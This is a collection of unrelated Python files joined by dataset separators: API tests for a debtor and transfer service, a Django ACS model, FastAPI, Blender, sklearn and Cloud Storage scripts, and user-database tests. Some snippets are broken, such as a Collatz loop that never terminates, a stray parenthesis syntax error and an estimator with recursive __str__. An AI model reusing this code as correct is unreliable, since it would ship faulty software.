assert datetime.fromisoformat(data['createdAt'])
r = client.post('/debtors/4294967296/activate', json={
'reservationId': reservation_id,
})
assert r.status_code == 200
r = client.post('/debtors/8589934591/activate', json={
'reservationId': 123,
})
assert r.status_code == 422
assert 'reservationId' in r.get_json()['errors']['json']
r = client.post('/debtors/8589934591/activate', json={})
assert r.status_code == 200
data = r.get_json()
assert data['type'] == 'Debtor'
assert data['uri'] == '/debtors/8589934591/'
assert data['balance'] == 0
assert datetime.fromisoformat(data['createdAt'])
assert 'info' not in data
r = client.post('/debtors/8589934591/activate', json={})
assert r.status_code == 409
r = client.get('/debtors/4294967296/')
assert r.status_code == 200
data = r.get_json()
assert data['type'] == 'Debtor'
assert data['uri'] == '/debtors/4294967296/'
assert data['balance'] == 0
assert datetime.fromisoformat(data['createdAt'])
r = client.get('/debtors/8589934591/')
assert r.status_code == 200
r = client.post('/debtors/8589934591/deactivate', headers={'X-Swpt-User-Id': 'debtors:8589934591'}, json={})
assert r.status_code == 403
r = client.post('/debtors/8589934591/deactivate', headers={'X-Swpt-User-Id': 'debtors-supervisor'}, json={})
assert r.status_code == 403
r = client.post('/debtors/8589934591/deactivate', headers={'X-Swpt-User-Id': 'debtors-superuser'}, json={})
assert r.status_code == 204
r = client.post('/debtors/8589934591/deactivate', json={})
assert r.status_code == 204
r = client.get('/debtors/8589934591/')
assert r.status_code == 403
r = client.post('/debtors/8589934591/deactivate', json={})
assert r.status_code == 204
def test_get_debtors_list(client):
r = client.post('/debtors/4294967296/reserve', json={})
assert r.status_code == 200
r = client.post('/debtors/4294967297/activate', json={})
assert r.status_code == 200
r = client.post('/debtors/4294967298/activate', json={})
assert r.status_code == 200
r = client.post('/debtors/8589934591/activate', json={})
assert r.status_code == 200
r = client.get('/debtors/.list')
assert r.status_code == 200
data = r.get_json()
assert data['type'] == 'DebtorsList'
assert data['uri'] == '/debtors/.list'
assert data['itemsType'] == 'ObjectReference'
assert data['first'] == '/debtors/9223372036854775808/enumerate'
entries = _get_all_pages(client, data['first'], page_type='ObjectReferencesPage')
assert entries == [
{'uri': '/debtors/4294967297/'},
{'uri': '/debtors/4294967298/'},
{'uri': '/debtors/8589934591/'},
]
def test_get_debtor(client, debtor):
r = client.get('/debtors/123/')
assert r.status_code == 200
data = r.get_json()
assert data['type'] == 'Debtor'
assert data['uri'] == '/debtors/123/'
assert data['config'] == {
'type': 'DebtorConfig',
'uri': '/debtors/123/config',
'configData': '',
'latestUpdateId': 1,
'latestUpdateAt': '1970-01-01T00:00:00+00:00',
'debtor': {'uri': '/debtors/123/'},
}
assert data['transfersList'] == {'uri': '/debtors/123/transfers/'}
assert data['createTransfer'] == {'uri': '/debtors/123/transfers/'}
assert data['balance'] == 0
assert datetime.fromisoformat(data['createdAt'])
assert data['identity'] == {'type': 'DebtorIdentity', 'uri': 'swpt:123'}
assert data['noteMaxBytes'] == 0
assert 'configError' not in data
assert 'account' not in data
def test_change_debtor_config(client, debtor):
r = client.get('/debtors/123/config')
assert r.status_code == 200
data = r.get_json()
assert data['type'] == 'DebtorConfig'
assert data['uri'] == '/debtors/123/config'
assert data['configData'] == ''
assert data['latestUpdateId'] == 1
latest_update_at = data['latestUpdateAt']
assert datetime.fromisoformat(latest_update_at)
assert data['debtor'] == {'uri': '/debtors/123/'}
request = {
'configData': 'TEST',
'latestUpdateId': 2
}
r = client.patch('/debtors/123/config', json=request)
assert r.status_code == 200
r = client.get('/debtors/123/config')
assert r.status_code == 200
data = r.get_json()
assert data['type'] == 'DebtorConfig'
assert data['uri'] == '/debtors/123/config'
assert data['configData'] == 'TEST'
assert data['latestUpdateId'] == 2
assert datetime.fromisoformat(data['latestUpdateAt'])
assert latest_update_at != data['latestUpdateAt']
assert data['debtor'] == {'uri': '/debtors/123/'}
empty_request = {
'configData': '',
'latestUpdateId': 2,
}
r = client.patch('/debtors/666/config', json=empty_request)
assert r.status_code == 404
r = client.patch('/debtors/123/config', json=empty_request)
assert r.status_code == 409
data = r.get_json()
for _ in range(9):
r = client.patch('/debtors/123/config', json=request)
assert r.status_code == 200
r = client.patch('/debtors/123/config', json=request)
assert r.status_code == 403
def test_initiate_running_transfer(client, debtor):
r = client.get('/debtors/666/transfers/')
assert r.status_code == 404
r = client.get('/debtors/123/transfers/')
assert r.status_code == 200
data = r.get_json()
assert data['debtor'] == {'uri': '/debtors/123/'}
assert data['type'] == 'TransfersList'
assert data['uri'] == '/debtors/123/transfers/'
assert data['items'] == []
json_request_body = {
'amount': 1000,
'noteFormat': 'fmt',
'note': 'test',
'recipient': {'uri': 'swpt:123/1111'},
'transferUuid': '123e4567-e89b-12d3-a456-426655440000',
}
r = client.post('/debtors/123/transfers/', json=json_request_body)
assert r.status_code == 201
data = r.get_json()
assert data['amount'] == 1000
assert datetime.fromisoformat(data['initiatedAt'])
assert 'result' not in data
assert data['recipient'] == {'type': 'AccountIdentity', 'uri': 'swpt:123/1111'}
assert data['type'] == 'Transfer'
assert data['uri'] == '/debtors/123/transfers/123e4567-e89b-12d3-a456-426655440000'
assert data['noteFormat'] == 'fmt'
assert data['note'] == 'test'
assert data['transfersList'] == {'uri': '/debtors/123/transfers/'}
assert r.headers['Location'] == 'http://example.com/debtors/123/transfers/123e4567-e89b-12d3-a456-426655440000'
r = client.get('/debtors/123/transfers/123e4567-e89b-12d3-a456-426655440000')
assert r.status_code == 200
data = r.get_json()
assert data['type'] == 'Transfer'
assert data['uri'] == '/debtors/123/transfers/123e4567-e89b-12d3-a456-426655440000'
assert data['amount'] == 1000
r = client.post('/debtors/123/transfers/', json=json_request_body)
assert r.status_code == 303
assert r.headers['Location'] == 'http://example.com/debtors/123/transfers/123e4567-e89b-12d3-a456-426655440000'
json_request_body['amount'] += 1
r = client.post('/debtors/123/transfers/', json=json_request_body)
assert r.status_code == 409
r = client.post('/debtors/123/transfers/', json={**json_request_body, **{'recipient': {'uri': 'INVALID'}}})
assert r.status_code == 422
r = client.post('/debtors/123/transfers/', json={**json_request_body, **{'recipient': {'uri': 'swpt:555/1111'}}})
assert r.status_code == 422
r = client.post('/debtors/555/transfers/', json={**json_request_body, **{'recipient': {'uri': 'swpt:555/1111'}}})
assert r.status_code == 404
r = client.get('/debtors/123/transfers/')
assert r.status_code == 200
data = r.get_json()
assert sorted(data['items']) == [
{'uri': '123e4567-e89b-12d3-a456-426655440000'},
]
r = client.delete('/debtors/123/transfers/123e4567-e89b-12d3-a456-426655440001')
assert r.status_code == 204
r = client.get('/debtors/123/transfers/')
assert r.status_code == 200
data = r.get_json()
assert sorted(data['items']) == [
{'uri': '123e4567-e89b-12d3-a456-426655440000'},
]
for i in range(2, 12):
suffix = '{:0>4}'.format(i)
json_request_body = {
'amount': 1,
'recipient': {'uri': 'swpt:123/1111'},
'transferUuid': f'123e4567-e89b-12d3-a456-42665544{suffix}',
}
r = client.post('/debtors/123/transfers/', json=json_request_body)
if i == 11:
assert r.status_code == 403
else:
assert r.status_code == 201
def test_cancel_running_transfer(client, debtor):
json_request_body = {
'amount': 1000,
'note': 'test',
'recipient': {'uri': 'swpt:123/1111'},
'transferUuid': '123e4567-e89b-12d3-a456-426655440000',
}
r = client.post('/debtors/123/transfers/', json=json_request_body)
assert r.status_code == 201
data = r.get_json()
assert 'result' not in data
r = client.post('/debtors/123/transfers/123e4567-e89b-12d3-a456-426655440001', json={})
assert r.status_code == 404
r = client.post('/debtors/123/transfers/123e4567-e89b-12d3-a456-426655440000', json={})
assert r.status_code == 200
r = client.get('/debtors/123/transfers/123e4567-e89b-12d3-a456-426655440000')
assert r.status_code == 200
data = r.get_json()
result = data['result']
error = result['error']
assert error['errorCode'] == 'CANCELED_BY_THE_SENDER'
r = client.post('/debtors/123/transfers/123e4567-e89b-12d3-a456-426655440000', json={})
assert r.status_code == 200
def test_unauthorized_debtor_id(debtor, client):
json_request_body = {
'type': 'DebtorConfig',
'configData': '',
'latestUpdateId': 2,
}
r = client.get('/debtors/123/')
assert r.status_code == 200
r = client.get('/debtors/123/', headers={'X-Swpt-User-Id': 'INVALID_USER_ID'})
assert r.status_code == 403
r = client.patch('/debtors/123/config', json=json_request_body, headers={'X-Swpt-User-Id': 'debtors-supervisor'})
assert r.status_code == 403
r = client.patch('/debtors/123/config', json=json_request_body, headers={'X-Swpt-User-Id': 'debtors:666'})
assert r.status_code == 403
r = client.patch('/debtors/123/config', json=json_request_body, headers={'X-Swpt-User-Id': 'debtors:123'})
assert r.status_code == 200
with pytest.raises(ValueError):
r = client.get(
'/debtors/18446744073709551615/',
json=json_request_body,
headers={'X-Swpt-User-Id': 'debtors:18446744073709551616'},
)
def test_redirect_to_debtor(client, debtor):
r = client.get('/debtors/.debtor')
assert r.status_code == 204
r = client.get('/debtors/.debtor', headers={'X-Swpt-User-Id': 'debtors:2'})
assert r.status_code == 303
assert r.headers['Location'] == 'http://example.com/debtors/2/'
r = client.get('/debtors/.debtor', headers={'X-Swpt-User-Id': 'debtors:18446744073709551615'})
assert r.status_code == 303
assert r.headers['Location'] == 'http://example.com/debtors/18446744073709551615/'
def test_redirect_to_latest_info(client, debtor):
r = client.get('/debtors/123/public')
assert r.status_code == 404
request = {
'configData': '{"info": {"iri": "https://example.com/"}}',
'latestUpdateId': 2
}
r = client.patch('/debtors/123/config', json=request)
assert r.status_code == 200
debtor = p.get_debtor(123)
current_ts = datetime.now(tz=timezone.utc)
p.process_account_update_signal(
debtor_id=debtor.debtor_id,
creditor_id=p.ROOT_CREDITOR_ID,
creation_date=date(2020, 1, 1),
last_change_ts=current_ts,
last_change_seqnum=1,
principal=0,
interest_rate=0.0,
last_config_ts=debtor.last_config_ts,
last_config_seqnum=debtor.last_config_seqnum,
negligible_amount=p.HUGE_NEGLIGIBLE_AMOUNT,
config_data='INCORRECT CONFIG DATA',
config_flags=debtor.config_flags,
account_id='',
transfer_note_max_bytes=0,
ts=current_ts,
ttl=10000000,
)
r = client.get('/debtors/123/public')
assert r.status_code == 404
p.process_account_update_signal(
debtor_id=debtor.debtor_id,
creditor_id=p.ROOT_CREDITOR_ID,
creation_date=date(2020, 1, 1),
last_change_ts=current_ts,
last_change_seqnum=2,
principal=0,
interest_rate=0.0,
last_config_ts=debtor.last_config_ts,
last_config_seqnum=debtor.last_config_seqnum,
negligible_amount=p.HUGE_NEGLIGIBLE_AMOUNT,
config_data=debtor.config_data,
config_flags=debtor.config_flags,
account_id='',
transfer_note_max_bytes=0,
ts=current_ts,
ttl=10000000,
)
r = client.get('/debtors/123/public')
assert r.status_code == 302
assert r.headers['Location'] == 'https://example.com/'
assert r.headers['Cache-Control'] == 'max-age=86400'
def test_save_document(client, debtor):
r = client.get('/debtors/123/documents/0/public')
assert r.status_code == 404
r = client.post(
'/debtors/123/documents/',
content_type='application/octet-stream',
data=101 * b'1',
)
assert r.status_code == 413
content = 100 * b'1'
r = client.post(
'/debtors/123/documents/',
content_type='application/octet-stream',
data=content,
)
assert r.status_code == 201
assert r.content_type == 'application/octet-stream'
assert r.get_data() == content
location = r.headers['Location']
m = re.match(r'http://example.com/debtors/123/documents/(\d)+/public', location)
assert m is not None
document_id = int(m.group(1))
assert document_id >= 0
r = client.get(location)
assert r.status_code == 200
assert r.content_type == 'application/octet-stream'
assert r.get_data() == content
r = client.post(
'/debtors/123/documents/',
content_type='application/octet-stream',
data=content,
)
assert r.status_code == 201
assert r.content_type == 'application/octet-stream'
assert r.get_data() == content
assert location != r.headers['Location']
r = client.post(
'/debtors/123/documents/',
content_type='application/octet-stream',
data=content,
)
assert r.status_code == 403
r = client.post(
'/debtors/666/documents/',
content_type='application/octet-stream',
data=content,
)
assert r.status_code == 404
| nilq/baby-python | python |
from lxml import etree
from defusedxml.lxml import fromstring
import uuid
from django.db import models
from django.http import HttpResponse
from django.urls import reverse
from django.core.exceptions import ObjectDoesNotExist
from acs.response import get_soap_envelope
from acs.models import AcsHttpBaseModel
from acs.utils import create_xml_document
class AcsHttpRequest(AcsHttpBaseModel):
""" Every HTTP request received on the ACS server URL is saved as an instance
of this model. """
acs_session = models.ForeignKey('acs.AcsSession', related_name='acs_http_requests', on_delete=models.PROTECT)
rpc_response_to = models.ForeignKey('acs.AcsHttpResponse', related_name='rpc_responses', null=True, blank=True, on_delete=models.PROTECT) # a foreignkey to the http response containing the acs rpc request which triggered the current http request (where relevant)
request_headers = models.TextField(blank=True)
request_xml_valid = models.BooleanField(default=False)
request_soap_valid = models.BooleanField(default=False)
class Meta:
ordering = ['-created_date']
def __str__(self):
return str(self.tag)
def get_absolute_url(self):
return reverse('acshttprequest_detail', kwargs={'pk': self.pk})
@property
def is_request(self):
return True
@property
def is_response(self):
return False
def get_response(self, empty_response=False):
'''
get_response() is called when the CPE is waiting for the ACS
to do something. This happens after the CPE does an empty POST, or after
the CPE has responded to an RPC call initiated by the ACS. It simply pops
a job from the queue and returns it in a http response.
'''
job = False
if not empty_response:
### get the first job from the queue (if any)
#jobs = AcsQueueJob.objects.filter(acs_device=self.acs_session.acs_device, processed=False).order_by('created_date')
jobs = self.acs_session.acs_device.acs_queue_jobs.filter(processed=False).order_by('created_date')
self.acs_session.acs_log("Found %s unprocessed acs queue jobs for the device %s" % (jobs.count(), self.acs_session.acs_device))
if jobs:
job = jobs.first()
self.acs_session.acs_log("Picked job %s" % job)
if not empty_response and job:
### get blank SOAP response envelope
response_cwmp_id = uuid.uuid4().hex
root, body = get_soap_envelope(response_cwmp_id, self.acs_session)
### add the cwmp soap object to the soap body
cwmpobj = fromstring(job.cwmp_rpc_object_xml.encode('utf-8'))
body.append(cwmpobj)
### get the rpc method
response_cwmp_rpc_method = job.cwmp_rpc_method
### put HTTP response together
output = etree.tostring(root, encoding='utf-8', xml_declaration=True)
response = HttpResponse(output, content_type='text/xml; charset=utf-8')
else:
### no jobs in queue for this acs device (or an empty response was requested), so return empty body to end this cwmp session
response = HttpResponse(status=204)
response_cwmp_rpc_method = '(empty response body)'
response_cwmp_id = ''
### save the http response
from acs.models import AcsHttpResponse
acs_http_response = AcsHttpResponse.objects.create(
http_request=self,
fk_body=create_xml_document(xml=response.content),
cwmp_id=response_cwmp_id,
soap_element="{%s}%s" % (self.acs_session.soap_namespaces['cwmp'], response_cwmp_rpc_method),
)
self.acs_session.acs_log("Created ACS HTTP response %s" % acs_http_response)
if job:
self.acs_session.acs_log("Saving AcsQueueJob %s" % job)
### save job
job.handled_in = acs_http_response
job.processed = True
job.save()
### all good, return response
self.acs_session.acs_log("Responding to CPE %s with %s" % (self.acs_session.acs_device, response_cwmp_rpc_method))
return response
| nilq/baby-python | python |
from typing import List
from fastapi import FastAPI
from pydantic import BaseModel
app = FastAPI()
class Product(BaseModel):
id: str
class Review(BaseModel):
body: str
product: Product
class User(BaseModel):
reviews: List[Review]
USER_DATA = {
"1": User(reviews=[Review(body="Great!", product=Product(id="1"))]),
"2": User(reviews=[Review(body="Great!", product=Product(id="2"))]),
"3": User(reviews=[Review(body="Great!", product=Product(id="3"))]),
}
@app.get("/users/{id}", response_model=User)
async def get_user_review(id: str) -> User:
return USER_DATA[id]
| nilq/baby-python | python |
import bpy
from bpy.props import *
PROP_TYPE_ICONS = {
"String": "SORTALPHA",
"Int": "CHECKBOX_DEHLT",
"Float": "RADIOBUT_OFF",
"Bool": "CHECKMARK",
"Vec2": "ORIENTATION_VIEW",
"Vec3": "ORIENTATION_GLOBAL",
"Vec4": "MESH_ICOSPHERE",
"Object": "OBJECT_DATA",
"CameraObject": "CAMERA_DATA",
"LightObject": "LIGHT_DATA",
"MeshObject": "MESH_DATA",
"SpeakerObject": "OUTLINER_DATA_SPEAKER"
}
def filter_objects(item, b_object):
if item.type == "CameraObject":
return b_object.type == "CAMERA"
if item.type == "LightObject":
return b_object.type == "LIGHT"
if item.type == "MeshObject":
return b_object.type == "MESH"
if item.type == "SpeakerObject":
return b_object.type == "SPEAKER"
if item.type == "Object":
return True
class ArmTraitPropWarning(bpy.types.PropertyGroup):
warning: StringProperty(name="Warning")
class ArmTraitPropListItem(bpy.types.PropertyGroup):
"""Group of properties representing an item in the list."""
name: StringProperty(
name="Name",
description="The name of this property",
default="Untitled")
type: EnumProperty(
items=(
# (Haxe Type, Display Name, Description)
("String", "String", "String Type"),
("Int", "Integer", "Integer Type"),
("Float", "Float", "Float Type"),
("Bool", "Boolean", "Boolean Type"),
("Vec2", "Vec2", "2D Vector Type"),
("Vec3", "Vec3", "3D Vector Type"),
("Vec4", "Vec4", "4D Vector Type"),
("Object", "Object", "Object Type"),
("CameraObject", "Camera Object", "Camera Object Type"),
("LightObject", "Light Object", "Light Object Type"),
("MeshObject", "Mesh Object", "Mesh Object Type"),
("SpeakerObject", "Speaker Object", "Speaker Object Type")),
name="Type",
description="The type of this property",
default="String")
# === VALUES ===
value_string: StringProperty(name="Value", default="")
value_int: IntProperty(name="Value", default=0)
value_float: FloatProperty(name="Value", default=0.0)
value_bool: BoolProperty(name="Value", default=False)
value_vec2: FloatVectorProperty(name="Value", size=2)
value_vec3: FloatVectorProperty(name="Value", size=3)
value_vec4: FloatVectorProperty(name="Value", size=4)
value_object: PointerProperty(
name="Value", type=bpy.types.Object, poll=filter_objects)
def set_value(self, val):
# Would require way too much effort, so it's out of scope here.
if self.type.endswith("Object"):
return
if self.type == "Int":
self.value_int = int(val)
elif self.type == "Float":
self.value_float = float(val)
elif self.type == "Bool":
self.value_bool = val == "true"
elif self.type in ("Vec2", "Vec3", "Vec4"):
if isinstance(val, str):
dimensions = int(self.type[-1])
# Parse "new VecX(...)"
val = val.split("(")[1].split(")")[0].split(",")
val = [value.strip() for value in val]
# new VecX() without parameters
if len(val) == 1 and val[0] == "":
# Use default value
return
# new VecX() with less parameters than its dimensions
while len(val) < dimensions:
val.append(0.0)
val = [float(value) for value in val]
setattr(self, "value_" + self.type.lower(), val)
else:
self.value_string = str(val)
def get_value(self):
if self.type == "Int":
return self.value_int
if self.type == "Float":
return self.value_float
if self.type == "Bool":
return self.value_bool
if self.type in ("Vec2", "Vec3", "Vec4"):
return list(getattr(self, "value_" + self.type.lower()))
if self.type.endswith("Object"):
if self.value_object is not None:
return self.value_object.name
return ""
return self.value_string
class ARM_UL_PropList(bpy.types.UIList):
def draw_item(self, context, layout, data, item, icon, active_data, active_propname, index):
item_value_ref = "value_" + item.type.lower()
custom_icon = PROP_TYPE_ICONS[item.type]
sp = layout.split(factor=0.3)
sp.label(text=item.type, icon=custom_icon)
sp = sp.split(factor=0.6)
sp.label(text=item.name)
# Make sure your code supports all 3 layout types
if self.layout_type in {'DEFAULT', 'COMPACT'}:
if item.type.endswith("Object"):
sp.prop_search(item, "value_object", context.scene, "objects", text="", icon=custom_icon)
else:
use_emboss = item.type in ("Bool", "String")
sp.prop(item, item_value_ref, text="", emboss=use_emboss)
elif self.layout_type in {'GRID'}:
layout.alignment = 'CENTER'
def register():
bpy.utils.register_class(ArmTraitPropWarning)
bpy.utils.register_class(ArmTraitPropListItem)
bpy.utils.register_class(ARM_UL_PropList)
def unregister():
bpy.utils.unregister_class(ARM_UL_PropList)
bpy.utils.unregister_class(ArmTraitPropListItem)
bpy.utils.unregister_class(ArmTraitPropWarning)
| nilq/baby-python | python |
import numpy as np
import pandas as pd
import sklearn
from typing import Dict, Tuple
from sklearn.base import BaseEstimator
class RuleAugmentedEstimator(BaseEstimator):
"""Augments sklearn estimators with rule-based logic.
This class is a wrapper class for sklearn estimators with the additional
possibility of adding rule-based logic to the underlying estimator.
The provided rules are hard-coded and take precedence over the underlying
estimator's predictions.
"""
def __init__(self, base_model: BaseEstimator, rules: Dict, **base_params):
"""Initializes the RuleAugmentedEstimator instance.
Initializes the rule-augmented estimator by supplying the underlying
sklearn estimator as well as the hard-coded rules.
Args:
base_model: The underlying sklearn estimator.
Must implement a fit and predict method.
rules: The hard-coded rules in the format of a dictionary,
with keys being the pandas dataframe column name, and the values
being a tuple in the following form:
(comparison operator, value, return value)
Acceptable comparison operators are:
"=", "<", ">", "<=", ">="
Example:
{"House Type": [
("=", "Penthouse", 1.0),
("=", "Shack", 0.0)
],
"House Price": [
("<", 1000.0, 0.0),
(">=", 500000.0, 1.0)
]}
**base_params: Optional keyword arguments which will be passed on
to the ``base_model``.
Examples:
The below example illustrates how an instance of the
RuleAugmentedEstimator class can be initialized with a trained
sklearn GradientBoostingRegressor instance.
>>> gbr = GradientBoostingRegressor()
>>> rules = {"House Type": [
("=", "Penthouse", 1.0),
("=", "Shack", 0.0)
],
"House Price": [
("<", 1000.0, 0.0),
(">=", 500000.0, 1.0)
]}
>>> ra_estimator = RuleAugmentedEstimator(gbr, rules)
"""
self.rules = rules
self.base_model = base_model
self.base_model.set_params(**base_params)
def __repr__(self):
return "Rule Augmented Estimator:\n\n\t Base Model: {}\n\t Rules: {}".format(self.base_model, self.rules)
def __str__(self):
return self.__str__
def _get_base_model_data(self, X: pd.DataFrame, y: pd.Series) -> Tuple[pd.DataFrame, pd.Series]:
"""Filters the trainig data for data points not affected by the rules."""
train_x = X
for category, rules in self.rules.items():
if category not in train_x.columns.values: continue
for rule in rules:
if rule[0] == "=":
train_x = train_x.loc[train_x[category] != rule[1]]
elif rule[0] == "<":
train_x = train_x.loc[train_x[category] >= rule[1]]
elif rule[0] == ">":
train_x = train_x.loc[train_x[category] <= rule[1]]
elif rule[0] == "<=":
train_x = train_x.loc[train_x[category] > rule[1]]
elif rule[0] == ">=":
train_x = train_x.loc[train_x[category] < rule[1]]
else:
print("Invalid rule detected: {}".format(rule))
indices = train_x.index.values
train_y = y.iloc[indices]
train_x = train_x.reset_index(drop=True)
train_y = train_y.reset_index(drop=True)
return train_x, train_y
def fit(self, X: pd.DataFrame, y: pd.Series, **kwargs):
"""Fits the estimator to the data.
Fits the estimator to the data, only training the underlying estimator
on data which isn't affected by the hard-coded rules.
Args:
X: The training feature data.
y: The training label data.
**kwargs: Optional keyword arguments passed to the underlying
estimator's fit function.
"""
train_x, train_y = self._get_base_model_data(X, y)
self.base_model.fit(train_x, train_y, **kwargs)
def predict(self, X: pd.DataFrame) -> np.array:
"""Gets predictions for the provided feature data.
The predicitons are evaluated using the provided rules wherever possible
otherwise the underlying estimator is used.
Args:
X: The feature data to evaluate predictions for.
Returns:
np.array: Evaluated predictions.
"""
p_X = X.copy()
p_X['prediction'] = np.nan
for category, rules in self.rules.items():
if category not in p_X.columns.values: continue
for rule in rules:
if rule[0] == "=":
p_X.loc[p_X[category] == rule[1], 'prediction'] = rule[2]
elif rule[0] == "<":
p_X.loc[p_X[category] < rule[1], 'prediction'] = rule[2]
elif rule[0] == ">":
p_X.loc[p_X[category] > rule[1], 'prediction'] = rule[2]
elif rule[0] == "<=":
p_X.loc[p_X[category] <= rule[1], 'prediction'] = rule[2]
elif rule[0] == ">=":
p_X.loc[p_X[category] >= rule[1], 'prediction'] = rule[2]
else:
print("Invalid rule detected: {}".format(rule))
if len(p_X.loc[p_X['prediction'].isna()].index != 0):
base_X = p_X.loc[p_X['prediction'].isna()].copy()
base_X.drop('prediction', axis=1, inplace=True)
p_X.loc[p_X['prediction'].isna(), 'prediction'] = self.base_model.predict(base_X)
return p_X['prediction'].values
def get_params(self, deep: bool = True) -> Dict:
"""Return the model's and base model's parameters.
Args:
deep: Whether to recursively return the base model's parameters.
Returns
Dict: The model's parameters.
"""
params = {'base_model': self.base_model,
'outcome_range': self.outcome_range,
'rules': self.rules
}
params.update(self.base_model.get_params(deep=deep))
return params
def set_params(self, **params):
"""Sets parameters for the model and base model.
Args:
**params: Optional keyword arguments.
"""
parameters = params
param_keys = parameters.keys()
if 'base_model' in param_keys:
value = parameters.pop('base_model')
self.base_model = value
if 'rules' in param_keys:
value = parameters.pop('rules')
self.rules = value
self.base_model.set_params(**parameters)
| nilq/baby-python | python |
# jay mahakal
import Resources.Work_By_Raj.Google_Calender_api.Resources.Setup
import Resources.Work_By_Raj.Google_Calender_api.Resources.Return_events_info
# below function [Setup.setup_calendar_credentials_return_service()] should run only once
# service = Setup.setup_calendar_credentials_return_service()
# print(Return_events_info.return_events_info("Give details about calendar events for today", service=service))
| nilq/baby-python | python |
print "Ejercicio de ciclos -Granizada-"
def par(n):
n=n/2
def impar(n):
n=n*3+1
n=int(raw_input("digite numero "))
while n>=1:
if n%2==0:
par(n)
print n
else:
impar(n)
print n
| nilq/baby-python | python |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri May 1 15:39:06 2020
@author: jireh.park
"""
import pandas as pd
import os
from tqdm import tqdm
from google.cloud import storage
os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = os.path.dirname(os.path.abspath(os.path.dirname(__file__)))+ '/key/level-district.json'
def list_blob(bucket_name):
global credentials
"""Uploads a file to the bucket."""
# bucket_name = "your-bucket-name"
# source_file_name = "local/path/to/file"
# destination_blob_name = "storage-object-name"
storage_client = storage.Client()
bucket = storage_client.bucket(bucket_name)
blobs = list(bucket.list_blobs())
#blob = bucket.blob(destination_blob_name)
#blob.upload_from_filename("tmp", content_type='text/csv')
# blob.upload_from_filename(source_file_name)
print(blobs)
)
bucket_name = 'j-first-bucket'
save_path = 'route/'
list_blob('bucket_name')
os.chdir("/Users/jireh.park/jireh_module/svc_data/route")
# 데이터 불러오기
df = pd.DataFrame()
for fl in os.listdir():
if 'txt' in fl:
data = pd.read_csv(fl,
engine = 'python', encoding = 'cp949', sep = '|', dtype = str)
df = df.append(data)
df = df.reset_index(drop = True)
# start, destination 뒤집어서 저
size = len(df)
col = ['time', 'num_station', 'transfer']
for ii in tqdm(df.index):
aa = df.loc[ii, 'route'][2:-2].split("', '")
aa.reverse()
df.loc[size + ii, 'start'] = df.loc[ii, 'destination']
df.loc[size + ii, 'destination'] = df.loc[ii, 'start']
for cl in col:
df.loc[size + ii, cl] = df.loc[ii, cl]
df.loc[size + ii, 'route'] = aa
df = df.reset_index(drop = True)
df.to_csv("route.csv", encoding = 'cp949', index = False)
#df.to_json("route.json")
| nilq/baby-python | python |
#!/usr/bin/env python2.7
import os
import codecs
import json
import random
with codecs.open(os.path.join(os.path.dirname(os.path.realpath(__file__)), "apps.txt"), encoding="utf-8") as f:
apps = f.read().splitlines()
with codecs.open(os.path.join(os.path.dirname(os.path.realpath(__file__)), "networks.txt"), encoding="utf-8") as f:
networks = f.read().splitlines()
dim_groups = [
["install_date", "install_country", "ad_network", "campaign"],
["install_date", "ad_network", "campaign"],
["install_date", "install_country", "ad_network"],
["install_date", "ad_network", "campaign", "event_name"],
["install_date", "install_country", "ad_network", "campaign", "event_name"]
]
metric_groups = [
["installs_count", "clicks_count", "launches_count"],
["installs_count", "install_cost", "install_cost_alt", "revenue", "revenue_alt"],
["revenue", "revenue_alt", "inapps_count"],
["clicks_count", "impressions_count", "installs_count", "launches_count"],
["clicks_count", "impressions_count", "installs_count", "uninstalls_count"]
]
date_ranges = [
["2015-01-01", "2015-01-14"],
["2015-01-01", "2015-01-30"],
["2013-05-01", "2013-05-14"],
["2014-01-01", "2015-03-01"],
["2014-12-01", "2015-01-01"],
["2015-02-01", "2015-02-08"],
["2013-01-01", "2013-03-01"]
]
country_groups = [
["US", "IR", "UK", "MX"],
["US", "IL", "KZ"],
["RU", "BE"],
["TG", "TH", "TJ", "TL", "TM", "TN", "TO", "TR", "TT", "TV", "TZ", "UA", "UG", "US", "UY", "UZ", "VA", "VC", "VE", "VN", "VU", "WS", "YE", "ZA", "ZM", "ZW"]
]
for i in range(1000):
dates = random.choice(date_ranges)
query = {
"type": "aggregate",
"table": "activity",
"select": [],
"filter": {
"op": "and",
"filters": [
{"op": "eq", "column": "app_id", "value": random.choice(apps)},
{"op": "ge", "column": "install_date", "value": dates[0]},
{"op": "lt", "column": "install_date", "value": dates[1]}
]
}
}
query["select"] = [{"column": c} for c in random.choice(dim_groups) + random.choice(metric_groups)]
if random.random() < 0.2:
query["filter"]["filters"].append({"op": "in", "column": "install_country", "values": random.choice(country_groups)})
if random.random() < 0.5:
query["filter"]["filters"].append({"op": "eq", "column": "ad_network", "value": random.choice(networks)})
print "http://localhost:5000/query POST %s" % json.dumps(query)
| nilq/baby-python | python |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""user表测试"""
from executor.database.models.user import Users
from executor.tests.database.base import DatabaseTestCase
from executor.exceptions import UserAlreadyExistException, \
IncorrectPasswordException
class TestOperatorUser(DatabaseTestCase):
data_file_path = "database_user_data.yaml"
def test_create_user(self):
user = Users.from_json(self.get_test_date("test_create_user"))
new_user = self.db.create_user(self.context, user)
self.assertIsInstance(new_user, Users)
self.db.delete_user(self.context, new_user.id, new_user.password)
def test_create_same_name_user(self):
user1 = Users.from_json(
self.get_test_date(
"test_create_same_name_user", "test_create_same_name_user1"))
user2 = Users.from_json(
self.get_test_date(
"test_create_same_name_user", "test_create_same_name_user2"))
self.db.create_user(self.context, user1)
self.assertRaises(UserAlreadyExistException,
self.db.create_user, self.context, user2)
self.db.delete_user(self.context, user1.phone, user1.password)
def test_create_same_phone_user(self):
user1 = Users.from_json(
self.get_test_date(
"test_create_same_phone_user", "test_create_same_phone_user1"
))
user2 = Users.from_json(
self.get_test_date(
"test_create_same_phone_user", "test_create_same_phone_user2"
))
self.db.create_user(self.context, user1)
self.assertRaises(UserAlreadyExistException,
self.db.create_user, self.context, user2)
self.db.delete_user(self.context, user1.phone, user1.password)
def test_get_user_by_id(self):
user = Users.from_json(
self.get_test_date("test_get_user_by_id")
)
n_user = self.db.create_user(self.context, user)
self.assertEqual(
n_user,
self.db.get_user(self.context, user.id, user.password))
self.db.delete_user(self.context, n_user.id, n_user.password)
def test_get_user_by_user_id(self):
user = Users.from_json(
self.get_test_date("test_get_user_by_user_id")
)
n_user = self.db.create_user(self.context, user)
self.assertEqual(
n_user,
self.db.get_user(self.context, user.user_id, user.password))
